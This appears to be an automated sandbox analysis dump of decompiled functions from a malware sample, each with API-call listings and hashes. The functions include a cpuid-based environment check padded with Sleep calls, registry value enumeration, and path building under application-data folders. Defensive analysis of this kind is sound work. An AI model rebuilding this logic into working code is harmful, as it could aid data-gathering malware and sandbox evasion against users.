                                        					E29DAE0FC( &_v24,  &_a4);
                                        					_v12 = 1;
                                        					_v8 = _t44;
                                        					_v24 = 0x29dd06d8;
                                        					E29DAFF06( &_v24, 0x29dd20bc);
                                        				}
                                        				_t36 = E29DAD5A5();
                                        				_t54 =  &_v24;
                                        				_t64 = _t36;
                                        				_a4 = "ios_base::eofbit set";
                                        				E29DAE0FC(_t54,  &_a4);
                                        				_v12 = 1;
                                        				_v8 = _t64;
                                        				_v24 = 0x29dd06d8;
                                        				_t38 = E29DAFF06( &_v24, 0x29dd20bc);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_push(_t54);
                                        				_t29 = _t38 + 0x30; // 0x29dd146c
                                        				_push(1);
                                        				_t68 =  *((intOrPtr*)( *_t29));
                                        				 *_t64 = _t68;
                                        				E29DADA5D( &_v40, 0);
                                        				_t40 =  *((intOrPtr*)(_t68 + 4));
                                        				if(_t40 < 0xffffffff) {
                                        					 *((intOrPtr*)(_t68 + 4)) = _t40 + 1;
                                        				}
                                        				E29DADA85( &_v12);
                                        				return _t64;
                                        			}

                                        APIs
                                        • __CxxThrowException@8.LIBCMT ref: 29D98D92
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                        • std::exception::exception.LIBCMT ref: 29D98DBB
                                        • __CxxThrowException@8.LIBCMT ref: 29D98DD6
                                        • std::exception::exception.LIBCMT ref: 29D98DF4
                                        • __CxxThrowException@8.LIBCMT ref: 29D98E0F
                                        • std::exception::exception.LIBCMT ref: 29D98E29
                                        • __CxxThrowException@8.LIBCMT ref: 29D98E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 4237746311-1866435925
                                        • Opcode ID: 5103affbf9ebf80334c40a9a17f168540f25626b351b2b9c3477a8428263008b
                                        • Instruction ID: 85f135387463bd6343c9548ce5d3085eefd7c76369efaa1ac292a578a206a627
                                        • Opcode Fuzzy Hash: 5103affbf9ebf80334c40a9a17f168540f25626b351b2b9c3477a8428263008b
                                        • Instruction Fuzzy Hash: AB2163B6801209BFDB04DFD8C980ADEBBB8AF64640F60816DE50577A40DB705717EBB6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D9F2D0(CHAR* __ecx, CHAR* __edx, intOrPtr __edi, CHAR* _a4) {
                                        				short _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v288;
                                        				char _v552;
                                        				void* _v1552;
                                        				intOrPtr _v1560;
                                        				char _v1564;
                                        				char _v1580;
                                        				intOrPtr _v1588;
                                        				char _v1592;
                                        				short _v1608;
                                        				char _v1612;
                                        				char _v1616;
                                        				CHAR* _v1620;
                                        				CHAR* _v1624;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t67;
                                        				signed int _t68;
                                        				intOrPtr* _t85;
                                        				WCHAR* _t90;
                                        				signed char _t91;
                                        				intOrPtr _t96;
                                        				intOrPtr _t97;
                                        				intOrPtr _t103;
                                        				intOrPtr _t104;
                                        				void* _t109;
                                        				char _t110;
                                        				void* _t111;
                                        				CHAR* _t117;
                                        				intOrPtr _t118;
                                        				intOrPtr _t142;
                                        				void* _t143;
                                        				CHAR* _t144;
                                        				void* _t145;
                                        				void* _t146;
                                        				void* _t148;
                                        				signed int _t149;
                                        				void* _t150;
                                        				void* _t154;
                                        
                                        				_t142 = __edi;
                                        				_t67 =  *0x29dd5664; // 0xd9555f04
                                        				_t68 = _t67 ^ _t149;
                                        				_v24 = _t68;
                                        				 *[fs:0x0] =  &_v16;
                                        				_t110 = 0;
                                        				_t144 = __edx;
                                        				_v1624 = _a4;
                                        				_v1620 = __ecx;
                                        				_v1612 = 0;
                                        				_v1616 = 0;
                                        				E29DB5640( &_v552, 0, 0x104);
                                        				E29DB5640( &_v1552, 0, 0x3e8);
                                        				lstrcatA( &_v552,  &_v1552 & (0 |  *0x29dd8500(0, 0x1c, 0, 0,  &_v1552, _t68, _t143, _t109,  *[fs:0x0], E29DC41EB, 0xffffffff) < 0x00000000) - 0x00000001);
                                        				lstrcatA( &_v552, _t144);
                                        				E29DB5640( &_v288, 0, 0x104);
                                        				_t154 = _t150 - 0x64c + 0x24;
                                        				lstrcatA( &_v288,  &_v552);
                                        				lstrcatA( &_v288, "\\");
                                        				_t117 =  *0x29dd7d54; // 0x15a1fe0
                                        				lstrcatA( &_v288, _t117);
                                        				_t85 =  &_v288;
                                        				_v1560 = 0xf;
                                        				_v1564 = 0;
                                        				_v1580 = 0;
                                        				_t145 = _t85 + 1;
                                        				do {
                                        					_t118 =  *_t85;
                                        					_t85 = _t85 + 1;
                                        				} while (_t118 != 0);
                                        				E29D892C0( &_v1580,  &_v288, _t85 - _t145);
                                        				_v8 = 0;
                                        				_t90 = E29DA4990( &_v1580,  &_v1608,  &_v1608);
                                        				if(_t90[0xa] >= 8) {
                                        					_t90 =  *_t90;
                                        				}
                                        				_t91 = GetFileAttributesW(_t90);
                                        				if(_t91 == 0xffffffff || (_t91 & 0x00000010) != 0) {
                                        					_t146 = 0;
                                        				} else {
                                        					_t146 = 1;
                                        				}
                                        				if(_v1588 >= 8) {
                                        					_push(_v1608);
                                        					E29DADF3B();
                                        					_t154 = _t154 + 4;
                                        				}
                                        				_v8 = 0xffffffff;
                                        				_v1588 = 7;
                                        				_v1592 = _t110;
                                        				_v1608 = 0;
                                        				if(_v1560 >= 0x10) {
                                        					_push(_v1580);
                                        					E29DADF3B();
                                        					_t154 = _t154 + 4;
                                        				}
                                        				_v1560 = 0xf;
                                        				_v1564 = _t110;
                                        				_v1580 = _t110;
                                        				if(_t146 != _t110 && E29D99300( &_v1612,  &_v1616,  &_v288) == 0) {
                                        					_t103 = _v1612;
                                        					if(_t103 != _t110) {
                                        						 *0x29dd8464(_t103, _t110);
                                        						_v1612 = _t110;
                                        					}
                                        					_t104 = _v1616;
                                        					if(_t104 != _t110) {
                                        						 *0x29dd8518(_t104);
                                        					}
                                        					_v1612 = _t110;
                                        					_v1616 = _t110;
                                        				}
                                        				_t138 = _v1616;
                                        				_t147 = _v1624;
                                        				E29D9B520(_t142, 0x29dcd617,  &_v552, _v1624, _v1612, _v1616,  *((intOrPtr*)(_t142 + 0x20)), _v1620, _t110);
                                        				if( *((intOrPtr*)(_t142 + 6)) != _t110) {
                                        					E29D9E9B0( &_v552, _t147, _t142, _t110);
                                        					_t110 = 0;
                                        				}
                                        				_t96 = _v1612;
                                        				if(_t96 != _t110) {
                                        					 *0x29dd8464(_t96, _t110);
                                        					_v1612 = _t110;
                                        				}
                                        				_t97 = _v1616;
                                        				if(_t97 != _t110) {
                                        					_t97 =  *0x29dd8518(_t97);
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t148);
                                        				_pop(_t111);
                                        				return E29DADF46(_t97, _t111, _v24 ^ _t149, _t138, _t142, _t148);
                                        			}













































                                        APIs
                                        • _memset.LIBCMT ref: 29D9F329
                                        • _memset.LIBCMT ref: 29D9F33E
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F352
                                        • lstrcatA.KERNEL32(?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F370
                                        • lstrcatA.KERNEL32(?,01596BD8,?,?,?,D9555F04,01599110,00000000), ref: 29D9F37E
                                        • _memset.LIBCMT ref: 29D9F391
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3A7
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3B9
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3CD
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F42C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFileFolderPath
                                        • String ID:
                                        • API String ID: 3917447719-0
                                        • Opcode ID: 86ff8985201db34bcf75999a53eb7551611a6ea56a67eff9b6af62b10602256f
                                        • Instruction ID: 61d6e8dd11226d0879bcc8034a20c97e4da5fa0108b46892c7a3acee3dba199d
                                        • Opcode Fuzzy Hash: 86ff8985201db34bcf75999a53eb7551611a6ea56a67eff9b6af62b10602256f
                                        • Instruction Fuzzy Hash: E87180B2901218AFDB24EF54CC84BDAB7B9EF98310F0081EDE509A7640DA359E95DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E29D81090(long __edx) {
                                        				long* _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				char _v24;
                                        				long _t17;
                                        				long _t21;
                                        				long* _t23;
                                        
                                        				_t21 = __edx;
                                        				_v24 = 0xffffffff;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				_v12 = 0;
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				_v8 =  &_v24;
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				_t23 = _v8;
                                        				asm("cpuid");
                                        				 *_t23 = 1;
                                        				_t23[1] = _t17;
                                        				_t23[2] = 0;
                                        				_t23[3] = _t21;
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				Sleep(1);
                                        				return _v16 >> 0x0000001f & 0x00000001;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: a3d4511a35a1d0cdb97c72efdda9935c89c109b1ce38a8f932a8587f3474c30b
                                        • Instruction ID: cf5b653bc14dd41e4a7b1e93b7a97be837d8d4ec131ef068e510fb1282180e19
                                        • Opcode Fuzzy Hash: a3d4511a35a1d0cdb97c72efdda9935c89c109b1ce38a8f932a8587f3474c30b
                                        • Instruction Fuzzy Hash: 90012D71A403486ED720BBAA8C06FDEBAE4EFC4710F11415AE5599B2C2D9F265808EA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E29D93CE0(void* __ebx, void* __edi) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v531;
                                        				char _v532;
                                        				void* _v536;
                                        				int _v540;
                                        				void* __esi;
                                        				signed int _t17;
                                        				intOrPtr _t27;
                                        				intOrPtr _t31;
                                        				void* _t39;
                                        				intOrPtr _t43;
                                        				intOrPtr _t44;
                                        				char* _t48;
                                        				intOrPtr _t51;
                                        				intOrPtr _t52;
                                        				char* _t53;
                                        				void* _t54;
                                        				signed int _t57;
                                        
                                        				_t54 = __edi;
                                        				_t39 = __ebx;
                                        				_t17 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t17 ^ _t57;
                                        				_v540 = 0xff;
                                        				_v532 = 0;
                                        				E29DB5640( &_v531, 0, 0xfe);
                                        				_t48 =  *0x29dd7e1c; // 0x15a5560
                                        				if(RegOpenKeyExA(0x80000001, _t48, 0, 0x20119,  &_v536) == 0) {
                                        					_t53 =  *0x29dd81ac; // 0x15a5e60
                                        					RegQueryValueExA(_v536, _t53, 0, 0,  &_v532,  &_v540);
                                        				}
                                        				RegCloseKey(_v536);
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				lstrcatA( &_v276,  &_v532);
                                        				lstrcatA( &_v276, "\\config\\");
                                        				_t27 =  *0x29dd7b18; // 0x15a5058
                                        				E29D93B60(_t39,  &_v532, _t27);
                                        				_t43 =  *0x29dd7da8; // 0x15a5cb0
                                        				_t56 =  &_v276;
                                        				E29D93B60(_t39,  &_v276, _t43);
                                        				_t51 =  *0x29dd7abc; // 0x15a5660
                                        				E29D93B60(_t39,  &_v276, _t51);
                                        				_t31 =  *0x29dd8268; // 0x15970d8
                                        				E29D93B60(_t39,  &_v276, _t31);
                                        				_t44 =  *0x29dd7e08; // 0x15a5820
                                        				E29D93B60(_t39, _t56, _t44);
                                        				_t52 =  *0x29dd800c; // 0x15a5cf8
                                        				return E29DADF46(E29D93B60(_t39, _t56, _t52), _t39, _v8 ^ _t57, _t52, _t54, _t56);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D93D13
                                        • RegOpenKeyExA.ADVAPI32(80000001,015A5560,00000000,00020119,?), ref: 29D93D35
                                        • RegQueryValueExA.ADVAPI32(?,015A5E60,00000000,00000000,00000000,000000FF), ref: 29D93D5F
                                        • RegCloseKey.ADVAPI32(?), ref: 29D93D6C
                                        • _memset.LIBCMT ref: 29D93D80
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D93D96
                                        • lstrcatA.KERNEL32(?,\config\), ref: 29D93DA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memsetlstrcat$CloseOpenQueryValue
                                        • String ID: \config\
                                        • API String ID: 1663104428-327132148
                                        • Opcode ID: 85ce363bb4925ad275b611bbd7e0501685aa7e1f2b06e1789570ebeb8672e27b
                                        • Instruction ID: 2c8a79304f01ee0a83b3e498784bb48e8e2b4e9e41f8ccec97061ac79d6f6c77
                                        • Opcode Fuzzy Hash: 85ce363bb4925ad275b611bbd7e0501685aa7e1f2b06e1789570ebeb8672e27b
                                        • Instruction Fuzzy Hash: 413107B298011CABD710FB54DC85FEB7338EB14B08F00859CF60A67180DA74AA95EBF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E29D9D7E6(void* __esi, void* __eflags) {
                                        				long __ebx;
                                        				void* _t61;
                                        				void* _t63;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        				void* _t71;
                                        				signed int _t72;
                                        
                                        				_t70 = __esi;
                                        				while(1) {
                                        					__edx = __ebp - 0x84;
                                        					__ecx = __ebp - 0x88;
                                        					__edx = __esi;
                                        					 *((intOrPtr*)(__ebp - 0xa0)) = E29D9D160(__ebp - 0x88, __esi, __ebp - 0x84);
                                        					GetProcessHeap() = HeapFree(__eax, __ebx, __esi);
                                        					__edi =  *(__ebp - 0x88);
                                        					__eax = GetProcessHeap();
                                        					__eax = HeapAlloc(__eax, 8,  *(__ebp - 0x88));
                                        					 *(__ebp - 0x94) = __eax;
                                        					if(__eax == __ebx) {
                                        						break;
                                        					}
                                        					__esi =  *(__ebp - 0x84);
                                        					__eax = E29DAE6AF(__eax, __edi, __esi);
                                        					if(__esi != __ebx) {
                                        						__eax = GetProcessHeap();
                                        						__eax = HeapFree(__eax, __ebx, __esi);
                                        						 *(__ebp - 0x84) = __ebx;
                                        					}
                                        					__bl =  *((intOrPtr*)(__ebp - 0xa0));
                                        					__esi = __ebp - 0x48;
                                        					__eax =  *(__ebp - 0x90);
                                        					__esi =  *(__ebp - 0x94);
                                        					__eax =  *(__ebp - 0x90) + 1;
                                        					__ebx = 0;
                                        					 *(__ebp - 0x90) = __eax;
                                        					if(__eax <  *((intOrPtr*)(__ebp - 0x98))) {
                                        						continue;
                                        					} else {
                                        						if( *((intOrPtr*)(__ebp - 0x9c)) != 0xff) {
                                        							L14:
                                        							GetProcessHeap() = HeapFree(__eax, __ebx, __esi);
                                        							__eax =  *(__ebp - 0x8c);
                                        							 *((intOrPtr*)(__eax + 0x14)) = 0xf;
                                        							 *(__eax + 0x10) = __ebx;
                                        							__edi = __ebp - 0x48;
                                        							__esi = __eax;
                                        							 *__eax = __bl;
                                        							__eax = E29D891D0(__edi, __eax);
                                        							__esi = 0x10;
                                        							if( *((intOrPtr*)(__ebp - 0x18)) >= 0x10) {
                                        								__eax =  *(__ebp - 0x2c);
                                        								_push( *(__ebp - 0x2c));
                                        								__eax = E29DADF3B();
                                        								__esp = __esp + 4;
                                        							}
                                        							 *((intOrPtr*)(__ebp - 0x18)) = 0xf;
                                        							 *(__ebp - 0x1c) = __ebx;
                                        							 *(__ebp - 0x2c) = __bl;
                                        							if( *((intOrPtr*)(__ebp - 0x34)) >= __esi) {
                                        								__ecx =  *(__ebp - 0x48);
                                        								_push( *(__ebp - 0x48));
                                        								__eax = E29DADF3B();
                                        								__esp = __esp + 4;
                                        							}
                                        							__eax =  *(__ebp - 0x8c);
                                        							L19:
                                        							 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                                        							_pop(_t69);
                                        							_pop(_t71);
                                        							_pop(_t63);
                                        							return E29DADF46(_t61, _t63,  *(_t72 - 0x10) ^ _t72, _t68, _t69, _t71);
                                        						}
                                        						__edx =  *(__ebp - 0xa8);
                                        						__ecx = __ebp - 0x64;
                                        						__edi = E29D89100(__ebp - 0x64,  *(__ebp - 0xa8));
                                        						__esi = __ebp - 0x2c;
                                        						 *((char*)(__ebp - 4)) = 3;
                                        						__eax = E29D891D0(__eax, __ebp - 0x2c);
                                        						 *((char*)(__ebp - 4)) = 1;
                                        						if( *((intOrPtr*)(__ebp - 0x50)) >= 0x10) {
                                        							__eax =  *(__ebp - 0x64);
                                        							_push( *(__ebp - 0x64));
                                        							__eax = E29DADF3B();
                                        							__esp = __esp + 4;
                                        						}
                                        						__eax =  *(__ebp - 0xa4);
                                        						__ecx = __eax;
                                        						__esi = __ecx + 1;
                                        						do {
                                        							__dl =  *__ecx;
                                        							__ecx = __ecx + 1;
                                        						} while (__dl != __bl);
                                        						__ecx = __ecx - __esi;
                                        						__ecx = __ebp - 0x2c;
                                        						__eax = E29D95540(__eax, __ebp - 0x2c, __ebp - 0x2c);
                                        						__ecx =  *(__ebp - 0x38);
                                        						__ecx =  *(__ebp - 0x1c);
                                        						__esi = __ebp - 0x64;
                                        						__edx = __ebp - 0x48;
                                        						__edi = E29D951E0( *(__ebp - 0x1c), __ebp - 0x48, __ebp - 0x64,  *(__ebp - 0x38));
                                        						__esi = __ebp - 0x48;
                                        						 *((char*)(__ebp - 4)) = 4;
                                        						__eax = E29D891D0(__eax, __ebp - 0x48);
                                        						 *((char*)(__ebp - 4)) = 1;
                                        						if( *((intOrPtr*)(__ebp - 0x50)) >= 0x10) {
                                        							__edx =  *(__ebp - 0x64);
                                        							_push( *(__ebp - 0x64));
                                        							__eax = E29DADF3B();
                                        							__esp = __esp + 4;
                                        						}
                                        						__esi =  *(__ebp - 0x94);
                                        						 *((intOrPtr*)(__ebp - 0x50)) = 0xf;
                                        						 *(__ebp - 0x54) = __ebx;
                                        						 *(__ebp - 0x64) = __bl;
                                        						goto L14;
                                        					}
                                        				}
                                        				__eax =  *(__ebp - 0x84);
                                        				if( *(__ebp - 0x84) != __ebx) {
                                        					GetProcessHeap() = HeapFree(__eax, __ebx, __eax);
                                        				}
                                        				__esi =  *(__ebp - 0x8c);
                                        				__ecx = __esi;
                                        				__eax = E29D89100(__ecx, 0x29dcd617);
                                        				__edi = 0x10;
                                        				if( *((intOrPtr*)(__ebp - 0x18)) >= 0x10) {
                                        					__eax =  *(__ebp - 0x2c);
                                        					_push( *(__ebp - 0x2c));
                                        					__eax = E29DADF3B();
                                        					__esp = __esp + 4;
                                        				}
                                        				 *((intOrPtr*)(__ebp - 0x18)) = 0xf;
                                        				 *(__ebp - 0x1c) = __ebx;
                                        				 *(__ebp - 0x2c) = __bl;
                                        				if( *((intOrPtr*)(__ebp - 0x34)) < __edi) {
                                        					_t61 = _t70;
                                        				} else {
                                        					__ecx =  *(__ebp - 0x48);
                                        					_push( *(__ebp - 0x48));
                                        					__eax = E29DADF3B();
                                        					__esp = __esp + 4;
                                        					__eax = __esi;
                                        				}
                                        				goto L19;
                                        			}
                                        0x29d9d9ed
                                        0x29d9d9f5
                                        0x29d9d9f7
                                        0x29d9d9fa
                                        0x29d9d9fb
                                        0x29d9da00
                                        0x29d9da00
                                        0x29d9da03
                                        0x29d9da0a
                                        0x29d9da0d
                                        0x29d9da13
                                        0x29d9d5e9
                                        0x29d9da19
                                        0x29d9da19
                                        0x29d9da1c
                                        0x29d9da1d
                                        0x29d9da22
                                        0x29d9da25
                                        0x29d9da25
                                        0x00000000

                                        APIs
                                          • Part of subcall function 29D9D160: lstrlenA.KERNEL32(?,D9555F04,?,?,00000000), ref: 29D9D1C4
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000), ref: 29D9D80C
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D813
                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 29D9D822
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D829
                                        • _strcpy_s.LIBCMT ref: 29D9D846
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 29D9D854
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 29D9D85B
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 29D9D941
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D948
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 29D9D9CE
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D9D5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$Free$Alloc_strcpy_slstrlen
                                        • String ID:
                                        • API String ID: 379925753-0
                                        • Opcode ID: 79067baad3cbfe766110a74abf692e44946dc6a4ca93d7d344c27770a28b4d1e
                                        • Instruction ID: d59f475baeb727a1ce243fc8e9aac49854dabe85ca7ccd81677ca231fc333ea4
                                        • Opcode Fuzzy Hash: 79067baad3cbfe766110a74abf692e44946dc6a4ca93d7d344c27770a28b4d1e
                                        • Instruction Fuzzy Hash: 94515D72D00258AFDF15EFA4C848BDEBB74BF15300F04849DE54A67601DB356A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 55%
                                        			E29D85590(void* __eflags, char* _a4) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				intOrPtr _v32;
                                        				CHAR* _v36;
                                        				CHAR* _v52;
                                        				char _v56;
                                        				intOrPtr _v68;
                                        				CHAR* _v72;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t40;
                                        				signed int _t41;
                                        				CHAR* _t48;
                                        				CHAR* _t50;
                                        				CHAR* _t52;
                                        				CHAR* _t54;
                                        				CHAR* _t56;
                                        				CHAR* _t58;
                                        				CHAR* _t61;
                                        				void* _t64;
                                        				CHAR* _t74;
                                        				CHAR* _t75;
                                        				char _t78;
                                        				void* _t79;
                                        				CHAR* _t83;
                                        				void* _t84;
                                        				signed int _t85;
                                        				void* _t86;
                                        				void* _t87;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC31A0);
                                        				_push( *[fs:0x0]);
                                        				_t87 = _t86 - 0x38;
                                        				_t40 =  *0x29dd5664; // 0xd9555f04
                                        				_t41 = _t40 ^ _t85;
                                        				_v24 = _t41;
                                        				_push(_t41);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t76 =  &_v72;
                                        				E29D85090( &_v56,  &_v72, _a4);
                                        				_t83 = 0;
                                        				_v8 = 0;
                                        				_t78 = _v56;
                                        				if(_t78 > 0) {
                                        					_t48 =  *0x29dd82d4; // 0x0
                                        					lstrcatA(_t48, "\n");
                                        					if(_t78 > 0) {
                                        						_v56 = _t78;
                                        						do {
                                        							_t13 =  &(_v72[4]); // 0x4
                                        							_t50 = _t83 + _t13;
                                        							if( *((intOrPtr*)(_t83 +  &(_v72[0x18]))) >= 0x10) {
                                        								_t50 =  *_t50;
                                        							}
                                        							_t76 =  *0x29dd82d4; // 0x0
                                        							lstrcatA(_t76, _t50);
                                        							_t52 =  *0x29dd82d4; // 0x0
                                        							lstrcatA(_t52, " : ");
                                        							_t54 = _v72;
                                        							if( *((intOrPtr*)(_t83 + _t54)) == 4) {
                                        								_t56 = E29DA4720( &_v52, __eflags,  *((intOrPtr*)(_t83 + _t54 + 0x40)));
                                        								_v8 = 1;
                                        								__eflags = _t56[0x14] - 0x10;
                                        								if(_t56[0x14] >= 0x10) {
                                        									_t56 =  *_t56;
                                        								}
                                        								_t74 =  *0x29dd82d4; // 0x0
                                        								lstrcatA(_t74, _t56);
                                        								_v8 = 0;
                                        								__eflags = _v32 - 0x10;
                                        								if(__eflags >= 0) {
                                        									_t76 = _v52;
                                        									_push(_v52);
                                        									E29DADF3B();
                                        									_t87 = _t87 + 4;
                                        								}
                                        								_t58 =  *0x29dd82d4; // 0x0
                                        								_push("\n");
                                        								_v32 = 0xf;
                                        								_v36 = 0;
                                        								_v52 = 0;
                                        								_push(_t58);
                                        							} else {
                                        								_t19 = _t54 + 0x20; // 0x20
                                        								_t61 = _t83 + _t19;
                                        								if( *((intOrPtr*)(_t83 + _t54 + 0x34)) >= 0x10) {
                                        									_t61 =  *_t61;
                                        								}
                                        								_t75 =  *0x29dd82d4; // 0x0
                                        								lstrcatA(_t75, _t61);
                                        								_t76 =  *0x29dd82d4; // 0x0
                                        								_push("\n");
                                        								_push(_t76);
                                        							}
                                        							lstrcatA();
                                        							_t83 = _t83 + 0x44;
                                        							_t31 =  &_v56;
                                        							 *_t31 = _v56 - 1;
                                        						} while ( *_t31 != 0);
                                        					}
                                        				}
                                        				_t45 = _v72;
                                        				if(_v72 != 0) {
                                        					_push(_v56);
                                        					E29D89DB0(_t45, _v68);
                                        					_t76 = _v72;
                                        					_push(_v72);
                                        					_t45 = E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t79);
                                        				_pop(_t84);
                                        				_pop(_t64);
                                        				return E29DADF46(_t45, _t64, _v24 ^ _t85, _t76, _t79, _t84);
                                        			}

                                        APIs
                                          • Part of subcall function 29D85090: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,80000001,D9555F04), ref: 29D8510D
                                          • Part of subcall function 29D85090: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?), ref: 29D85163
                                        • lstrcatA.KERNEL32(00000000,29DCD628,D9555F04), ref: 29D855E5
                                        • lstrcatA.KERNEL32(00000000,00000004), ref: 29D85612
                                        • lstrcatA.KERNEL32(00000000, : ), ref: 29D85623
                                        • lstrcatA.KERNEL32(00000000,00000020), ref: 29D85646
                                        • lstrcatA.KERNEL32(00000000,00000000,?), ref: 29D8567A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D856AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$EnumOpenValue
                                        • String ID: :
                                        • API String ID: 1373340110-3653984579
                                        • Opcode ID: 4375dd4ce7180049225aa17dee9fba7f860fa3dd211c8736362b4d231ea1bbd0
                                        • Instruction ID: 6a7773eafd9cd7e0562e115d710b645a489b5a5118e112a27c963e4be8ed2ff0
                                        • Opcode Fuzzy Hash: 4375dd4ce7180049225aa17dee9fba7f860fa3dd211c8736362b4d231ea1bbd0
                                        • Instruction Fuzzy Hash: 5F41B2B2941248EFCB11DF94D980EAFBBBAFF59740F50815DE50297605DB34AD02EBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29DA7CE0(intOrPtr* __edi) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				char _v20;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				signed int _t28;
                                        				intOrPtr _t32;
                                        				void* _t36;
                                        				intOrPtr _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				char _t50;
                                        				intOrPtr _t53;
                                        				intOrPtr* _t65;
                                        				signed int _t67;
                                        				intOrPtr _t68;
                                        				signed int _t70;
                                        
                                        				_t65 = __edi;
                                        				_push(0xffffffff);
